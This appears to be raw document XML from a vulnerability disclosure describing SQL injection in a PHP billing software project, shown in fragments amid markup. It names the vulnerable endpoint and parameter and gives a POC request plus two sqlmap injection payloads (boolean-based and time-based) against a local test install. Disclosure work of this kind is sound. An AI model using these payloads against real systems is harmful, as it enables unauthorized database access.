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t>BILLING SOFTWARE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="2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18"/>
        </w:rPr>
        <w:t>SQL injection vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="18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Vulnerability Description: BILLING SOFTWARE SQL injection vulnerability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Manufacturer Information: www.kashipara.com/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Affected Version: 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Environment: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Download Source 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https://www.kashipara.com/project/download/project2/user/2023/202310/kashipara.com_billing-software-zip.zip </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="194945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Code Analysis: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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785" cy="1570355"/>
            <wp:effectExtent l="0" t="0" r="825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 xml:space="preserve"> Insufficient validation and filtering of id parameters allows attackers to create a malicious request that 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POC：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/billing/item_list_edit.php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*/*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application/x-www-form-urlencoded; charset=UTF-8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X-Requested-With: XMLHttpRequest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cors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empty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http://localhost/billing/buyer_details.php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PHPSESSID=vcssfak4odk78ee70p6p0ee04m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id=1&amp;action=updateItem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Sqlmap：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1489075"/>
            <wp:effectExtent l="0" t="0" r="444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id=1' AND 3151=(SELECT (CASE WHEN (3151=3151) THEN 3151 ELSE (SELECT 9436 UNION SELECT 7829) END))-- -&amp;action=updateItem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id=1' AND 1444=BENCHMARK(5000000,MD5(0x6e544d64))-- RCDr&amp;action=updateItem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2.txt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106635EC"/>
    <w:rsid w:val="106635EC"/>
    <w:rsid w:val="578A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2024-01-09T05:58:00Z</dcterms:created>
  <dc:creator>WPS_1645946387</dc:creator>
  <cp:lastModifiedBy>WPS_1645946387</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-11T09:26:24Z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E108F992B5E34A8AA2E8C8838BA2DE7A_11</vt:lpwstr>
  </property>
</Properties>
</file>